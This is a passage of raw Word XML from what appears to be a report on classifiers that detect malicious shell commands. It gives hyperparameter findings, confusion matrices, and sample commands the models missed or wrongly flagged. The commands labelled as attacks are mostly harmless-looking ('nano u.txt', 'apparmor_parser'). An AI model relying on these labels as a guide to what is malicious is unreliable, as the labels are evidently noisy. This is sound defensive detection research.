              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Which hyperparameter most affects </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">RF </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max_depth</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — but weakly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Largest RF swing on both datasets (D2: 0.7311 → 0.7584 across depth at n=500, Δ0.027); everything else is ≤0.012.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Which hyperparameter most affects </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FPR</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">IF </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>contamination</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — by design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FPR 0.047 → 0.287 (D1), a 6× swing that tracks c one-for-one; RF's depth is second (0.031 vs 0.052 at n=500, ~1.7×).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Which model is more sensitive overall?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Isolation Forest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Its usable output depends entirely on threshold placement (F1 0.25 → 0.64 on D1 between the wrapper point and c=0.10); RF holds a narrow F1 band across its whole grid (0.021 D1 / 0.027 D2).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The same division of labour Ben found for XGBoost/CNN reappears here:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>**accuracy is set by the representation, false alarms by a purpose-built</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>dial.** RF's F1 band is nearly flat — the 43-feature set, not tree capacity,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>is the ceiling — while its depth cap mainly buys false-alarm reduction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">IF's dial does not touch the model at all: it </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the operating point. The</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>deployment lesson is that both of Noam's models are cheap to operate and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>hard to misconfigure catastrophically, provided one rule is respected: cap RF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>depth (≈20) rather than growing full trees, and never let IF's stage-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>threshold be chosen by F1 — choose it by the recall the cascade must retain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:br w:type="page"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 8.1 — Forensic error analysis (Ben's models)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confusion matrices: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/figures/ch8_confusion_xgboost_hybrid_dataset1.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/figures/ch8_confusion_xgboost_hybrid_dataset2.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/figures/ch8_confusion_cnn1d_dataset1.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/figures/ch8_confusion_cnn1d_dataset2.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Sample-level FN/FP command strings (capped at 40 per cell): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>results/ch8_failures.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The by-source counts below are over every error, from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>results/ch8_confusion.json</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>xgboost_hybrid/dataset1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Confusion [tn, fp, fn, tp] = [2192, 95, 94, 668]; F1 0.876, Recall 0.877, FPR 0.042.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>False negatives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by source (all 94): {'hacktricks': 59, 'gtfobins': 19, 'atomic_red_team': 15, 'slp': 1}.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>False positives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by source (all 95): {'tldr': 29, 'nl2bash': 28, 'linlm': 21, 'bash6k': 14, 'bash_instruct': 3}.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example missed attacks (FN): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bconsole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apparmor_parser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[ ! -z "$COMMAND" ] &amp;&amp; echo VERSIONSTART "$p" "$("${COMMAND%%[[:space:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example benign flagged (FP): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>unset -f ls /bin/ls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>zeroclaw cron add "* * * * *" "command"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fluent-bit -c /etc/fluent-bit/fluent-bit.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>xgboost_hybrid/dataset2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Confusion [tn, fp, fn, tp] = [1365, 71, 74, 405]; F1 0.848, Recall 0.846, FPR 0.049.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>False negatives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by source (all 74): {'honeypot': 74}.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>False positives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by source (all 71): {'bash_history': 58, 'commandlinefu': 13}.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example missed attacks (FN): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nano u.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>31m&gt;&gt;&gt;&gt; Server Gasit incepem Testele \033[1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/gisdfoewrsfdf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example benign flagged (FP): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Zsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tar -zxvf 'download (1)'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat i3log* 2&gt; /dev/null | tail</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>cnn1d/dataset1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Confusion [tn, fp, fn, tp] = [2160, 127, 91, 671]; F1 0.860, Recall 0.881, FPR 0.056.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>False negatives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by source (all 91): {'hacktricks': 51, 'gtfobins': 22, 'atomic_red_team': 16, 'slp': 2}.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>False positives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by source (all 127): {'tldr': 39, 'nl2bash': 37, 'linlm': 32, 'bash6k': 15, 'bash_instruct': 4}.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example missed attacks (FN): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bconsole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apparmor_parser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>yarn --cwd .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example benign flagged (FP): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>unset -f ls /bin/ls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo "{:key 'val}" | bb -I "(:key (first *input*))"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>docker run -e VAR=value nginx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>cnn1d/dataset2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Confusion [tn, fp, fn, tp] = [1340, 96, 64, 415]; F1 0.838, Recall 0.866, FPR 0.067.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>False negatives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by source (all 64): {'honeypot': 64}.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>False positives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by source (all 96): {'bash_history': 72, 'commandlinefu': 24}.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example missed attacks (FN): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nano u.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>31m&gt;&gt;&gt;&gt; Server Gasit incepem Testele \033[1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/gisdfoewrsfdf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example benign flagged (FP): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Zsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dpigs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cp ~/.functions bash/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cross-model contrast to write up:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> compare which commands XGBoost misses that the CNN catches and vice-versa — the CNN reads raw char motifs (catches obfuscated/adjacent payloads), XGBoost reads engineered conjunctions (catches family co-occurrence). The disagreement set is exactly what the cascade (8.4) and the LLM triage (bonus) are designed to resolve.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 8.1 — Forensic Error Analysis: Random Forest and Isolation Forest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Noam's half of 8.1 (Ben covers XGBoost-hybrid and the CNN in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch8_1_error_forensics_ben.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>). Confusion matrices and per-source error</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">counts are generated into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch8_1_error_forensics_noam.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>analysis/ch8_error_analysis.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>; the overlap, recovery and feature-signature</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">figures below come from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>analysis/ch8_1_rf_if_forensics.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
